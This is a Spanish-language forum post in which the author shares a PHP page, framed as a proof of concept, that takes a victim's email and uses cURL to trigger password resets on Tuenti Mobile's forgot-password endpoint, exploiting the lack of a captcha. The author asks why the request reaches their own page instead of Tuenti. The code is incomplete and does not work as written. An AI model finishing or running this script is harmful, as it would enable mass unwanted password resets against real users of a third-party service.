Bueno, expongo todo el script, quiero hacer un PoC, en Tuenti Móvil no hay ningún captcha que regule que sea máguina/humano el que reseteé la contraseña de algún usuario, para ello he creado este script:
Código PHP:
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>Resetear Pass de Tuenti</title>
<center>
<h2>Resetear Pass de Tuenti</h2> <br>
<span>Esto puede realizarse debido a que no hay captcha en la plataforma móvil de Tuenti ):-)</span>
</center>
Mail:<br>
<!-- :D -->
<form name="Resetear" method="post">
<input name="tuentiemail" type="text"></input>
<input type="submit" value="Resetear">
</form>
<?php
$mail = $_POST [ "tuentiemail" ];
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "http://m.tuenti.com/?m=login&func=process_forgot_password");
curl_setopt($ch,CURLOPT_HTTPHEADER,array("tuentiemail: $mail"));
?>
</html>
Aunque al ejecutarse, el parametro se envía a la cabecera de mi web y no a la que realmente quiero enviarla. Ya que en la url citada en el script basta con crear un parametro llamado tuentiemail y darle como valor un correo electrónico para llevar acabo el reseteo.